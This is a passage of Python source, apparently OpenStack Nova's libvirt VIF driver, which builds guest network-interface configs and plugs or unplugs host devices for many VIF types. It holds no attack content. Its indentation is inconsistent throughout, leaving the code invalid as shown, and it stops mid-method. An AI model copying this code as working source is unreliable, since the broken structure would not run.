                        network_model.VIF_MODEL_RTL8139,
                        network_model.VIF_MODEL_E1000,
                        network_model.VIF_MODEL_SPAPR_VLAN]
    valid_models = {
        'qemu': _qemu_kvm_models,
        'kvm': _qemu_kvm_models,
        'xen': [network_model.VIF_MODEL_NETFRONT,
                network_model.VIF_MODEL_NE2K_PCI,
                network_model.VIF_MODEL_PCNET,
                network_model.VIF_MODEL_RTL8139,
                network_model.VIF_MODEL_E1000],
        'lxc': [],
        'uml': [],
    }
    if vif_model is None:
        return True
    if virt_type not in valid_models:
        raise exception.UnsupportedVirtType(virt=virt_type)
    return vif_model in valid_models[virt_type]
class LibvirtGenericVIFDriver(object):
"""Generic VIF driver for libvirt networking."""
def _normalize_vif_type(self, vif_type):
return vif_type.replace('2.1q', '2q')
def get_vif_devname(self, vif):
    """Return the VIF's explicit device name, or derive one from its id."""
    if 'devname' in vif:
        return vif['devname']
    generated = "nic" + vif['id']
    return generated[:network_model.NIC_NAME_LEN]
def get_vif_devname_with_prefix(self, vif, prefix):
    """Device name with its 3-char prefix replaced by *prefix*."""
    base = self.get_vif_devname(vif)
    return prefix + base[3:]
def get_base_config(self, instance, vif, image_meta,
                    inst_type, virt_type):
    """Build the common guest-interface config (model/driver/queues).

    Selection order for the NIC model: image 'hw_vif_model' property if
    set, else virtio for kvm/qemu when use_virtio_for_bridges is on,
    else None (libvirt's choice). Raises UnsupportedHardware when the
    chosen model is invalid for *virt_type*.
    """
    conf = vconfig.LibvirtConfigGuestInterface()
    # Default to letting libvirt / the hypervisor choose the model
    model = None
    driver = None
    vhost_queues = None
    # If the user has specified a 'vif_model' against the
    # image then honour that model
    if image_meta:
        vif_model = image_meta.properties.get('hw_vif_model')
        if vif_model is not None:
            model = vif_model
    # Else if the virt type is KVM/QEMU, use virtio according
    # to the global config parameter
    if (model is None and
            virt_type in ('kvm', 'qemu') and
            CONF.libvirt.use_virtio_for_bridges):
        model = network_model.VIF_MODEL_VIRTIO
    # Workaround libvirt bug, where it mistakenly
    # enables vhost mode, even for non-KVM guests
    if (model == network_model.VIF_MODEL_VIRTIO and
            virt_type == "qemu"):
        driver = "qemu"
    if not is_vif_model_valid_for_virt(virt_type,
                                       model):
        raise exception.UnsupportedHardware(model=model,
                                            virt=virt_type)
    # virtio multiqueue is only applicable to kvm+virtio combinations;
    # the image/flavor decide whether it is enabled.
    if (virt_type == 'kvm' and
            model == network_model.VIF_MODEL_VIRTIO):
        vhost_drv, vhost_queues = self._get_virtio_mq_settings(image_meta,
                                                               inst_type)
        driver = vhost_drv or driver
    designer.set_vif_guest_frontend_config(
        conf, vif['address'], model, driver, vhost_queues)
    return conf
def _get_virtio_mq_settings(self, image_meta, flavor):
    """Return (driver, vhost_queues) for virtio multiqueue, when the
    image requests it via 'hw_vif_multiqueue_enabled'; (None, None)
    otherwise.
    """
    if not isinstance(image_meta, objects.ImageMeta):
        image_meta = objects.ImageMeta.from_dict(image_meta)
    if image_meta.properties.get('hw_vif_multiqueue_enabled'):
        # One queue per guest vCPU.
        return ('vhost', flavor.vcpus)
    return (None, None)
def get_bridge_name(self, vif):
    """Name of the bridge this VIF's network attaches to."""
    network = vif['network']
    return network['bridge']
def get_ovs_interfaceid(self, vif):
    """OVS interface id for the VIF, falling back to the VIF id."""
    interfaceid = vif.get('ovs_interfaceid')
    if not interfaceid:
        interfaceid = vif['id']
    return interfaceid
def get_br_name(self, iface_id):
    """Per-VIF hybrid bridge name: 'qbr' + truncated interface id."""
    name = "qbr" + iface_id
    return name[:network_model.NIC_NAME_LEN]
def get_veth_pair_names(self, iface_id):
    """Names of the qvb/qvo veth pair for *iface_id* (length-limited)."""
    limit = network_model.NIC_NAME_LEN
    qvb = ("qvb%s" % iface_id)[:limit]
    qvo = ("qvo%s" % iface_id)[:limit]
    return (qvb, qvo)
def get_firewall_required(self, vif):
    """Whether nova's own firewall driver must filter this VIF."""
    # Neutron-side filtering makes nova's firewall redundant.
    if vif.is_neutron_filtering_enabled():
        return False
    return CONF.firewall_driver != "nova.virt.firewall.NoopFirewallDriver"
def get_config_bridge(self, instance, vif, image_meta,
                      inst_type, virt_type, host):
    """Get VIF configurations for bridge type."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    designer.set_vif_host_backend_bridge_config(
        conf, self.get_bridge_name(vif),
        self.get_vif_devname(vif))
    # nwfilter name is derived from instance name + MAC (colons removed)
    # and is only attached when nova's firewall is in play.
    mac_id = vif['address'].replace(':', '')
    name = "nova-instance-" + instance.name + "-" + mac_id
    if self.get_firewall_required(vif):
        conf.filtername = name
    designer.set_vif_bandwidth_config(conf, inst_type)
    return conf
def get_config_ovs_bridge(self, instance, vif, image_meta,
                          inst_type, virt_type, host):
    """Config for a guest interface plugged straight into the OVS bridge."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    bridge = self.get_bridge_name(vif)
    iface_id = self.get_ovs_interfaceid(vif)
    devname = self.get_vif_devname(vif)
    designer.set_vif_host_backend_ovs_config(conf, bridge, iface_id,
                                             devname)
    designer.set_vif_bandwidth_config(conf, inst_type)
    return conf
def get_config_ovs_hybrid(self, instance, vif, image_meta,
                          inst_type, virt_type, host):
    """Hybrid plug: point the guest at the per-VIF linux bridge instead
    of the OVS integration bridge."""
    bridged_vif = copy.deepcopy(vif)
    bridged_vif['network']['bridge'] = self.get_br_name(vif['id'])
    return self.get_config_bridge(instance, bridged_vif, image_meta,
                                  inst_type, virt_type, host)
def get_config_ovs(self, instance, vif, image_meta,
                   inst_type, virt_type, host):
    """Dispatch to the hybrid or direct OVS config builder."""
    use_hybrid = (self.get_firewall_required(vif)
                  or vif.is_hybrid_plug_enabled())
    builder = (self.get_config_ovs_hybrid if use_hybrid
               else self.get_config_ovs_bridge)
    return builder(instance, vif, image_meta, inst_type, virt_type, host)
def get_config_ivs_hybrid(self, instance, vif, image_meta,
                          inst_type, virt_type, host):
    """Hybrid plug for IVS: guest attaches to the per-VIF linux bridge."""
    bridged_vif = copy.deepcopy(vif)
    bridged_vif['network']['bridge'] = self.get_br_name(vif['id'])
    return self.get_config_bridge(instance, bridged_vif, image_meta,
                                  inst_type, virt_type, host)
def get_config_ivs_ethernet(self, instance, vif, image_meta,
                            inst_type, virt_type, host):
    """Config for an IVS port attached as a plain ethernet tap device."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    devname = self.get_vif_devname(vif)
    designer.set_vif_host_backend_ethernet_config(conf, devname)
    return conf
def get_config_ivs(self, instance, vif, image_meta,
                   inst_type, virt_type, host):
    """Dispatch to the hybrid or direct IVS config builder."""
    use_hybrid = (self.get_firewall_required(vif)
                  or vif.is_hybrid_plug_enabled())
    builder = (self.get_config_ivs_hybrid if use_hybrid
               else self.get_config_ivs_ethernet)
    return builder(instance, vif, image_meta, inst_type, virt_type, host)
def get_config_802qbg(self, instance, vif, image_meta,
                      inst_type, virt_type, host):
    """Config for an 802.1qbg (VEPA) port; the qbg parameters come
    straight from the VIF's 'qbg_params' mapping."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    params = vif["qbg_params"]
    designer.set_vif_host_backend_802qbg_config(
        conf, vif['network'].get_meta('interface'),
        params['managerid'],
        params['typeid'],
        params['typeidversion'],
        params['instanceid'])
    designer.set_vif_bandwidth_config(conf, inst_type)
    return conf
def get_config_802qbh(self, instance, vif, image_meta,
                      inst_type, virt_type, host):
    """Config for an 802.1qbh (VN-Link) port; uses hostdev passthrough
    when the vnic_type is direct, macvtap 'direct' otherwise."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    profile = vif["profile"]
    vif_details = vif["details"]
    net_type = 'direct'
    if vif['vnic_type'] == network_model.VNIC_TYPE_DIRECT:
        net_type = 'hostdev'
    designer.set_vif_host_backend_802qbh_config(
        conf, net_type, profile['pci_slot'],
        vif_details[network_model.VIF_DETAILS_PROFILEID])
    designer.set_vif_bandwidth_config(conf, inst_type)
    return conf
def get_config_hw_veb(self, instance, vif, image_meta,
                      inst_type, virt_type, host):
    """Config for a hardware VEB (SR-IOV) port; hostdev passthrough for
    direct vnic_type, macvtap 'direct' otherwise. VLAN comes from the
    VIF details."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    profile = vif["profile"]
    vif_details = vif["details"]
    net_type = 'direct'
    if vif['vnic_type'] == network_model.VNIC_TYPE_DIRECT:
        net_type = 'hostdev'
    designer.set_vif_host_backend_hw_veb(
        conf, net_type, profile['pci_slot'],
        vif_details[network_model.VIF_DETAILS_VLAN])
    designer.set_vif_bandwidth_config(conf, inst_type)
    return conf
def get_config_macvtap(self, instance, vif, image_meta,
                       inst_type, virt_type, host):
    """Config for a macvtap ('direct') port.

    All three macvtap detail keys must be present; otherwise
    VifDetailsMissingMacvtapParameters is raised listing the absent ones.
    """
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    vif_details = vif['details']
    required = (network_model.VIF_DETAILS_MACVTAP_SOURCE,
                network_model.VIF_DETAILS_MACVTAP_MODE,
                network_model.VIF_DETAILS_PHYS_INTERFACE)
    missing_params = [key for key in required
                      if vif_details.get(key) is None]
    if missing_params:
        raise exception.VifDetailsMissingMacvtapParameters(
            vif_id=vif['id'],
            missing_params=missing_params)
    designer.set_vif_host_backend_direct_config(
        conf,
        vif_details.get(network_model.VIF_DETAILS_MACVTAP_SOURCE),
        vif_details.get(network_model.VIF_DETAILS_MACVTAP_MODE))
    designer.set_vif_bandwidth_config(conf, inst_type)
    return conf
def get_config_iovisor(self, instance, vif, image_meta,
                       inst_type, virt_type, host):
    """Config for a PLUMgrid IO Visor port (plain ethernet backend)."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    devname = self.get_vif_devname(vif)
    designer.set_vif_host_backend_ethernet_config(conf, devname)
    designer.set_vif_bandwidth_config(conf, inst_type)
    return conf
def get_config_midonet(self, instance, vif, image_meta,
                       inst_type, virt_type, host):
    """Config for a MidoNet port (plain ethernet backend)."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    devname = self.get_vif_devname(vif)
    designer.set_vif_host_backend_ethernet_config(conf, devname)
    return conf
def get_config_tap(self, instance, vif, image_meta,
                   inst_type, virt_type, host):
    """Config for a bare tap device (VIF_TYPE_TAP)."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    devname = self.get_vif_devname(vif)
    designer.set_vif_host_backend_ethernet_config(conf, devname)
    return conf
def get_config_mlnx_direct(self, instance, vif, image_meta,
                           inst_type, virt_type, host):
    """Config for a Mellanox direct port; backend is the eth-prefixed
    device name."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    devname = self.get_vif_devname_with_prefix(vif, DEV_PREFIX_ETH)
    # NOTE(review): set_vif_host_backend_direct_config is called with two
    # args here but with three (source, mode) in get_config_macvtap --
    # verify the designer signature supports both forms.
    designer.set_vif_host_backend_direct_config(conf, devname)
    designer.set_vif_bandwidth_config(conf, inst_type)
    return conf
def get_config_vhostuser(self, instance, vif, image_meta,
                         inst_type, virt_type, host):
    """Config for a vhostuser port; requires the socket path in the VIF
    details, mode defaults to 'server'."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    vif_details = vif['details']
    mode = vif_details.get(network_model.VIF_DETAILS_VHOSTUSER_MODE,
                           'server')
    sock_path = vif_details.get(network_model.VIF_DETAILS_VHOSTUSER_SOCKET)
    if sock_path is None:
        raise exception.VifDetailsMissingVhostuserSockPath(
            vif_id=vif['id'])
    designer.set_vif_host_backend_vhostuser_config(conf, mode, sock_path)
    # (vladikr) Not setting up driver and queues for vhostuser
    # as queues are not supported in Libvirt until version 1.2.17
    if not host.has_min_version(MIN_LIBVIRT_VHOSTUSER_MQ):
        LOG.debug('Queues are not a vhostuser supported feature.')
        conf.driver_name = None
        conf.vhost_queues = None
    return conf
def get_config_ib_hostdev(self, instance, vif, image_meta,
                          inst_type, virt_type, host):
    """PCI hostdev passthrough config for an InfiniBand port."""
    conf = vconfig.LibvirtConfigGuestHostdevPCI()
    designer.set_vif_host_backend_ib_hostdev_config(
        conf, vif['profile']['pci_slot'])
    return conf
def get_config_vrouter(self, instance, vif, image_meta,
                       inst_type, virt_type, host):
    """Config for a Contrail vrouter port (plain ethernet backend)."""
    conf = self.get_base_config(instance, vif, image_meta,
                                inst_type, virt_type)
    devname = self.get_vif_devname(vif)
    designer.set_vif_host_backend_ethernet_config(conf, devname)
    designer.set_vif_bandwidth_config(conf, inst_type)
    return conf
def get_config(self, instance, vif, image_meta,
               inst_type, virt_type, host):
    """Dispatch to the get_config_<type> builder for this VIF.

    :raises exception.NovaException: when the VIF carries no type, or no
        builder method exists for that type.
    """
    vif_type = vif['type']
    # BUGFIX: the debug format string previously read
    # 'virt_type%(virt_type)s' (missing '='), producing output like
    # 'virt_typekvm'.
    LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
              'vif=%(vif)s virt_type=%(virt_type)s',
              {'vif_type': vif_type, 'instance': instance,
               'vif': vif, 'virt_type': virt_type})
    if vif_type is None:
        raise exception.NovaException(
            _("vif_type parameter must be present "
              "for this vif_driver implementation"))
    # '802.1qbg' etc. is normalized so it can form a method name.
    vif_slug = self._normalize_vif_type(vif_type)
    func = getattr(self, 'get_config_%s' % vif_slug, None)
    if not func:
        raise exception.NovaException(
            _("Unexpected vif_type=%s") % vif_type)
    return func(instance, vif, image_meta,
                inst_type, virt_type, host)
def plug_bridge(self, instance, vif):
    """Ensure that the bridge exists, and add VIF to it."""
    network = vif['network']
    # Only create host-side plumbing when this host owns the network
    # (not multi_host) and the network asks for a bridge.
    if (not network.get_meta('multi_host', False) and
            network.get_meta('should_create_bridge', False)):
        if network.get_meta('should_create_vlan', False):
            # VLAN case: bridge on top of a VLAN sub-interface.
            iface = CONF.vlan_interface or \
                network.get_meta('bridge_interface')
            LOG.debug('Ensuring vlan %(vlan)s and bridge %(bridge)s',
                      {'vlan': network.get_meta('vlan'),
                       'bridge': self.get_bridge_name(vif)},
                      instance=instance)
            linux_net.LinuxBridgeInterfaceDriver.ensure_vlan_bridge(
                network.get_meta('vlan'),
                self.get_bridge_name(vif),
                iface)
        else:
            # Flat case: bridge directly on the physical interface.
            iface = CONF.flat_interface or \
                network.get_meta('bridge_interface')
            LOG.debug("Ensuring bridge %s",
                      self.get_bridge_name(vif), instance=instance)
            linux_net.LinuxBridgeInterfaceDriver.ensure_bridge(
                self.get_bridge_name(vif),
                iface)
def plug_ovs_bridge(self, instance, vif):
    """Nothing to do: libvirt attaches the port to OVS itself."""
    pass
def _plug_bridge_with_port(self, instance, vif, port):
    """Create the per-VIF linux bridge and veth pair, then attach the
    host end to either an OVS or an IVS port (*port* is 'ovs'/'ivs').
    Idempotent: bridge and veth creation are skipped when the devices
    already exist."""
    iface_id = self.get_ovs_interfaceid(vif)
    br_name = self.get_br_name(vif['id'])
    v1_name, v2_name = self.get_veth_pair_names(vif['id'])
    if not linux_net.device_exists(br_name):
        utils.execute('brctl', 'addbr', br_name, run_as_root=True)
        utils.execute('brctl', 'setfd', br_name, 0, run_as_root=True)
        utils.execute('brctl', 'stp', br_name, 'off', run_as_root=True)
        # Disable multicast snooping on the new bridge; exit code 1 is
        # tolerated (sysfs knob may be absent on some kernels).
        utils.execute('tee',
                      ('/sys/class/net/%s/bridge/multicast_snooping' %
                       br_name),
                      process_input='0',
                      run_as_root=True,
                      check_exit_code=[0, 1])
        # Disable IPv6 on the bridge when the kernel exposes the knob.
        disv6 = '/proc/sys/net/ipv6/conf/%s/disable_ipv6' % br_name
        if os.path.exists(disv6):
            utils.execute('tee',
                          disv6,
                          process_input='1',
                          run_as_root=True,
                          check_exit_code=[0, 1])
    if not linux_net.device_exists(v2_name):
        linux_net._create_veth_pair(v1_name, v2_name)
        utils.execute('ip', 'link', 'set', br_name, 'up', run_as_root=True)
        # v1 goes into the linux bridge; v2 becomes the switch port below.
        utils.execute('brctl', 'addif', br_name, v1_name, run_as_root=True)
        if port == 'ovs':
            linux_net.create_ovs_vif_port(self.get_bridge_name(vif),
                                          v2_name, iface_id,
                                          vif['address'], instance.uuid)
        elif port == 'ivs':
            linux_net.create_ivs_vif_port(v2_name, iface_id,
                                          vif['address'], instance.uuid)
def plug_ovs_hybrid(self, instance, vif):
    """Plug using the hybrid strategy.

    Builds a per-VIF linux bridge joined to the OVS integration bridge
    by a veth pair, with the OVS end configured as a normal OVS port;
    libvirt then boots the VIF on the linux bridge.
    """
    self._plug_bridge_with_port(instance, vif, port='ovs')
def plug_ovs(self, instance, vif):
    """Plug an OVS VIF, using the hybrid path when filtering is needed."""
    use_hybrid = (self.get_firewall_required(vif)
                  or vif.is_hybrid_plug_enabled())
    if use_hybrid:
        self.plug_ovs_hybrid(instance, vif)
    else:
        self.plug_ovs_bridge(instance, vif)
def plug_ivs_ethernet(self, instance, vif):
    """Create the tap device and register it directly as an IVS port."""
    devname = self.get_vif_devname(vif)
    linux_net.create_tap_dev(devname)
    linux_net.create_ivs_vif_port(devname,
                                  self.get_ovs_interfaceid(vif),
                                  vif['address'],
                                  instance.uuid)
def plug_ivs_hybrid(self, instance, vif):
    """Plug using the hybrid strategy (same shape as OVS).

    Builds a per-VIF linux bridge joined to the switch by a veth pair,
    with the far end configured as a normal IVS port; libvirt then boots
    the VIF on the linux bridge.
    """
    self._plug_bridge_with_port(instance, vif, port='ivs')
def plug_ivs(self, instance, vif):
    """Plug an IVS VIF, using the hybrid path when filtering is needed."""
    use_hybrid = (self.get_firewall_required(vif)
                  or vif.is_hybrid_plug_enabled())
    if use_hybrid:
        self.plug_ivs_hybrid(instance, vif)
    else:
        self.plug_ivs_ethernet(instance, vif)
def plug_mlnx_direct(self, instance, vif):
    """Register a Mellanox direct port via ebrctl; requires the VIF to
    carry a physical network (fabric) name."""
    vnic_mac = vif['address']
    device_id = instance.uuid
    fabric = vif.get_physical_network()
    if not fabric:
        raise exception.NetworkMissingPhysicalNetwork(
            network_uuid=vif['network']['id'])
    dev_name = self.get_vif_devname_with_prefix(vif, DEV_PREFIX_ETH)
    try:
        utils.execute('ebrctl', 'add-port', vnic_mac, device_id, fabric,
                      network_model.VIF_TYPE_MLNX_DIRECT, dev_name,
                      run_as_root=True)
    except processutils.ProcessExecutionError:
        # Best-effort: failure is logged, not propagated.
        LOG.exception(_LE("Failed while plugging vif"), instance=instance)
def plug_ib_hostdev(self, instance, vif):
    """Register an InfiniBand hostdev port via ebrctl; requires the VIF
    to carry a physical network (fabric) name."""
    fabric = vif.get_physical_network()
    if not fabric:
        raise exception.NetworkMissingPhysicalNetwork(
            network_uuid=vif['network']['id']
        )
    pci_slot = vif['profile']['pci_slot']
    device_id = instance['uuid']
    vnic_mac = vif['address']
    try:
        utils.execute('ebrctl', 'add-port', vnic_mac, device_id,
                      fabric, network_model.VIF_TYPE_IB_HOSTDEV,
                      pci_slot, run_as_root=True)
    except processutils.ProcessExecutionError:
        # Best-effort: failure is logged, not propagated.
        LOG.exception(
            _LE("Failed while plugging ib hostdev vif"),
            instance=instance
        )
def plug_802qbg(self, instance, vif):
    """No host-side plugging needed for 802.1qbg ports."""
    pass
def plug_802qbh(self, instance, vif):
    """No host-side plugging needed for 802.1qbh ports."""
    pass
def plug_hw_veb(self, instance, vif):
    """For macvtap-type SR-IOV VIFs, program the VF's MAC and VLAN on
    the host; direct-type VFs need no host-side setup here."""
    if vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP:
        linux_net.set_vf_interface_vlan(
            vif['profile']['pci_slot'],
            mac_addr=vif['address'],
            vlan=vif['details'][network_model.VIF_DETAILS_VLAN])
def plug_macvtap(self, instance, vif):
    """When the macvtap VIF carries a VLAN, ensure the VLAN
    sub-interface (the macvtap source device) exists on the physical
    interface; untagged VIFs need no host-side setup."""
    vif_details = vif['details']
    vlan = vif_details.get(network_model.VIF_DETAILS_VLAN)
    if vlan:
        vlan_name = vif_details.get(
            network_model.VIF_DETAILS_MACVTAP_SOURCE)
        phys_if = vif_details.get(network_model.VIF_DETAILS_PHYS_INTERFACE)
        linux_net.LinuxBridgeInterfaceDriver.ensure_vlan(
            vlan, phys_if, interface=vlan_name)
def plug_midonet(self, instance, vif):
    """Plug into MidoNet's network port

    Bind the vif to a MidoNet virtual port.
    """
    dev = self.get_vif_devname(vif)
    port_id = vif['id']
    try:
        linux_net.create_tap_dev(dev)
        utils.execute('mm-ctl', '--bind-port', port_id, dev,
                      run_as_root=True)
    except processutils.ProcessExecutionError:
        # Best-effort: failure is logged, not propagated.
        LOG.exception(_LE("Failed while plugging vif"), instance=instance)
def plug_iovisor(self, instance, vif):
    """Plug using PLUMgrid IO Visor Driver

    Connect a network device to their respective
    Virtual Domain in PLUMgrid Platform.
    """
    dev = self.get_vif_devname(vif)
    iface_id = vif['id']
    linux_net.create_tap_dev(dev)
    net_id = vif['network']['id']
    tenant_id = instance.project_id
    try:
        # Register the tap as a gateway port, then bring it up bound to
        # the network label plus iface id, tagged with net/tenant ids.
        utils.execute('ifc_ctl', 'gateway', 'add_port', dev,
                      run_as_root=True)
        utils.execute('ifc_ctl', 'gateway', 'ifup', dev,
                      'access_vm',
                      vif['network']['label'] + "_" + iface_id,
                      vif['address'], 'pgtag2=%s' % net_id,
                      'pgtag1=%s' % tenant_id, run_as_root=True)
    except processutils.ProcessExecutionError:
        # Best-effort: failure is logged, not propagated.
        LOG.exception(_LE("Failed while plugging vif"), instance=instance)
def plug_tap(self, instance, vif):
"""Plug a VIF_TYPE_TAP virtual interface."""
dev = self.get_vif_devname(vif)
mac = vif['details'].get(network_model.VIF_DETAILS_TAP_MAC_ADDRESS)
linux_net.create_tap_dev(dev, mac)
linux_net._set_device_mtu(dev)
def plug_vhostuser(self, instance, vif):
ovs_plug = vif['details'].get(
network_model.VIF_DETAILS_VHOSTUSER_OVS_PLUG,
False)
if ovs_plug:
iface_id = self.get_ovs_interfaceid(vif)
port_name = os.path.basename(
vif['details'][network_model.VIF_DETAILS_VHOSTUSER_SOCKET])
linux_net.create_ovs_vif_port(self.get_bridge_name(vif),
port_name, iface_id, vif['address'],
instance.uuid)
linux_net.ovs_set_vhostuser_port_type(port_name)
def plug_vrouter(self, instance, vif):
"""Plug into Contrail's network port
Bind the vif to a Contrail virtual port.
"""
dev = self.get_vif_devname(vif)
ip_addr = '0.0.0.0'
ip6_addr = None
subnets = vif['network']['subnets']
for subnet in subnets:
if not subnet['ips']:
continue
ips = subnet['ips'][0]
if not ips['address']:
continue
if (ips['version'] == 4):
if ips['address'] is not None:
ip_addr = ips['address']
if (ips['version'] == 6):
if ips['address'] is not None:
ip6_addr = ips['address']
ptype = 'NovaVMPort'
if (cfg.CONF.libvirt.virt_type == 'lxc'):
ptype = 'NameSpacePort'
cmd_args = ("--oper=add --uuid=%s --instance_uuid=%s --vn_uuid=%s "
"--vm_project_uuid=%s --ip_address=%s --ipv6_address=%s"
" --vm_name=%s --mac=%s --tap_name=%s --port_type=%s "
"--tx_vlan_id=%d --rx_vlan_id=%d" % (vif['id'],
instance.uuid, vif['network']['id'],
instance.project_id, ip_addr, ip6_addr,
instance.display_name, vif['address'],
vif['devname'], ptype, -1, -1))
try:
linux_net.create_tap_dev(dev)
utils.execute('vrouter-port-control', cmd_args, run_as_root=True)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while plugging vif"), instance=instance)
def plug(self, instance, vif):
vif_type = vif['type']
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s',
{'vif_type': vif_type, 'instance': instance,
'vif': vif})
if vif_type is None:
raise exception.VirtualInterfacePlugException(
_("vif_type parameter must be present "
"for this vif_driver implementation"))
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'plug_%s' % vif_slug, None)
if not func:
raise exception.VirtualInterfacePlugException(
_("Plug vif failed because of unexpected "
"vif_type=%s") % vif_type)
func(instance, vif)
    def unplug_bridge(self, instance, vif):
        """No manual unplugging required; this is intentionally a no-op."""
        pass
    def unplug_ovs_bridge(self, instance, vif):
        """No manual unplugging required; this is intentionally a no-op."""
        pass
    def unplug_ovs_hybrid(self, instance, vif):
        """UnPlug using hybrid strategy.

        Unhook port from OVS, unhook port from bridge, delete
        bridge, and delete both veth devices.
        """
        try:
            br_name = self.get_br_name(vif['id'])
            v1_name, v2_name = self.get_veth_pair_names(vif['id'])
            if linux_net.device_exists(br_name):
                # Detach the veth from the linux bridge, take the bridge
                # down, then remove it -- order matters for brctl.
                utils.execute('brctl', 'delif', br_name, v1_name,
                              run_as_root=True)
                utils.execute('ip', 'link', 'set', br_name, 'down',
                              run_as_root=True)
                utils.execute('brctl', 'delbr', br_name,
                              run_as_root=True)
            linux_net.delete_ovs_vif_port(self.get_bridge_name(vif),
                                          v2_name)
        except processutils.ProcessExecutionError:
            # Best-effort teardown: log and continue.
            LOG.exception(_LE("Failed while unplugging vif"),
                          instance=instance)
def unplug_ovs(self, instance, vif):
if self.get_firewall_required(vif) or vif.is_hybrid_plug_enabled():
self.unplug_ovs_hybrid(instance, vif)
else:
self.unplug_ovs_bridge(instance, vif)
    def unplug_ivs_ethernet(self, instance, vif):
        """Unplug the VIF by deleting the port from the bridge."""
        try:
            linux_net.delete_ivs_vif_port(self.get_vif_devname(vif))
        except processutils.ProcessExecutionError:
            # Best-effort teardown: log and continue.
            LOG.exception(_LE("Failed while unplugging vif"),
                          instance=instance)
    def unplug_ivs_hybrid(self, instance, vif):
        """UnPlug using hybrid strategy (same as OVS).

        Unhook port from IVS, unhook port from bridge, delete
        bridge, and delete both veth devices.
        """
        try:
            br_name = self.get_br_name(vif['id'])
            v1_name, v2_name = self.get_veth_pair_names(vif['id'])
            # Detach veth, take the bridge down, remove it, then drop the
            # IVS side of the pair -- order matters for brctl.
            utils.execute('brctl', 'delif', br_name, v1_name, run_as_root=True)
            utils.execute('ip', 'link', 'set', br_name, 'down',
                          run_as_root=True)
            utils.execute('brctl', 'delbr', br_name, run_as_root=True)
            linux_net.delete_ivs_vif_port(v2_name)
        except processutils.ProcessExecutionError:
            # Best-effort teardown: log and continue.
            LOG.exception(_LE("Failed while unplugging vif"),
                          instance=instance)
def unplug_ivs(self, instance, vif):
if self.get_firewall_required(vif) or vif.is_hybrid_plug_enabled():
self.unplug_ivs_hybrid(instance, vif)
else:
self.unplug_ivs_ethernet(instance, vif)
def unplug_mlnx_direct(self, instance, vif):
vnic_mac = vif['address']
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id'])
try:
utils.execute('ebrctl', 'del-port', fabric,
vnic_mac, run_as_root=True)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
def unplug_ib_hostdev(self, instance, vif):
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id']
)
vnic_mac = vif['address']
try:
utils.execute('ebrctl', 'del-port', fabric, vnic_mac,
run_as_root=True)
except Exception:
LOG.exception(_LE("Failed while unplugging ib hostdev vif"))
    def unplug_802qbg(self, instance, vif):
        """No host-side teardown for 802.1Qbg VIFs; deliberate no-op."""
        pass
    def unplug_802qbh(self, instance, vif):
        """No host-side teardown for 802.1Qbh VIFs; deliberate no-op."""
        pass
    def unplug_hw_veb(self, instance, vif):
        """Unplug a hardware VEB VIF; only macvtap vNICs need a VF reset."""
        if vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP:
            # The ip utility doesn't accept the MAC 00:00:00:00:00:00.
            # Therefore, keep the MAC unchanged.  Later operations on
            # the same VF will not be affected by the existing MAC.
            linux_net.set_vf_interface_vlan(vif['profile']['pci_slot'],
                                            mac_addr=vif['address'])
    def unplug_macvtap(self, instance, vif):
        """No host-side teardown; the VLAN device is left in place."""
        pass
def unplug_midonet(self, instance, vif):
"""Unplug from MidoNet network port
Unbind the vif from a MidoNet virtual port.
"""
dev = self.get_vif_devname(vif)
port_id = vif['id']
try:
utils.execute('mm-ctl', '--unbind-port', port_id,
run_as_root=True)
linux_net.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
def unplug_tap(self, instance, vif):
"""Unplug a VIF_TYPE_TAP virtual interface."""
dev = self.get_vif_devname(vif)
try:
linux_net.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_LE("Failed while unplugging vif"),
instance=instance)
    def unplug_iovisor(self, instance, vif):
        """Unplug using PLUMgrid IO Visor Driver.

        Delete the network device and its connection to the Virtual
        Domain in the PLUMgrid Platform.
        """
        iface_id = vif['id']
        dev = self.get_vif_devname(vif)
        try:
            # Bring the interface down, deregister it from the gateway,
            # then remove the tap device itself.
            utils.execute('ifc_ctl', 'gateway', 'ifdown',
                          dev, 'access_vm',
                          vif['network']['label'] + "_" + iface_id,
                          vif['address'], run_as_root=True)
            utils.execute('ifc_ctl', 'gateway', 'del_port', dev,
                          run_as_root=True)
            linux_net.delete_net_dev(dev)
        except processutils.ProcessExecutionError:
            # Best-effort teardown: log and continue.
            LOG.exception(_LE("Failed while unplugging vif"),
                          instance=instance)
def unplug_vhostuser(self, instance, vif):
ovs_plug = vif['details'].get(
network_model.VIF_DETAILS_VHOSTUSER_OVS_PLUG,
False)
if ovs_plug:
port_name = os.path.basename(
vif['details'][network_model.VIF_DETAILS_VHOSTUSER_SOCKET])
linux_net.delete_ovs_vif_port(self.get_bridge_name(vif),
port_name)
def unplug_vrouter(self, instance, vif):
"""Unplug Contrail's network port
Unbind the vif from a Contrail virtual port.
"""
dev = self.get_vif_devname(vif)
cmd_args = ("--oper=delete --uuid=%s" % (vif['id']))
